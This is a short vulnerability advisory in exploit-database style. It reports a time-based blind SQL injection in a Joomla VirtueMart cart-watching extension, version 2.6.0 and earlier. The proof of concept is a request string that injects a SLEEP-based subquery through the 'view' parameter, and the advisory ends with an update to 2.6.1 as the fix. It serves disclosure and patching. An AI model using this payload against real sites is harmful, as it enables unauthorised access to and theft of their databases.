# Exploit Title: Sqli Blind Timebased on Joomla + Viertuemart + aweb-cartwatching-system/aweb-cartwatching <= 2.6.0
# Date: 28-12-2016
# Software Link: http://awebsupport.com/products/aweb-cartwatching-system
# Exploit Author: Javi Espejo(qemm)
# Contact: http://twitter.com/javiespejo
# Website: http://raipson.com
# CVE: REQUESTED
# Category: webapps
1. Description
Any remote user can access to the victim server trough a SQLI Blind Injection on a component of aweb_cartwatching_system and aweb_cart_autosave
This the code that has the parameters with the parameters not sanitized
2. Proof of Concept
option=com_virtuemart&view=categorysearch' RLIKE (SELECT * FROM (SELECT(SLEEP(5)))sgjA) AND 'jHwz'='jHwz&task=smartSearch and it works and I can access to every database on the client system launching other queries.
3. Solution:
Update to version 2.6.1 from the update center of joomla.
The Joomla vel publish the vulnerability on
Answer from Joomla VEL "We have added it to the VEL here: https://vel.joomla.org/resolved/1897-aweb-cart-watching-system-2-6-0
http://awebsupport.com/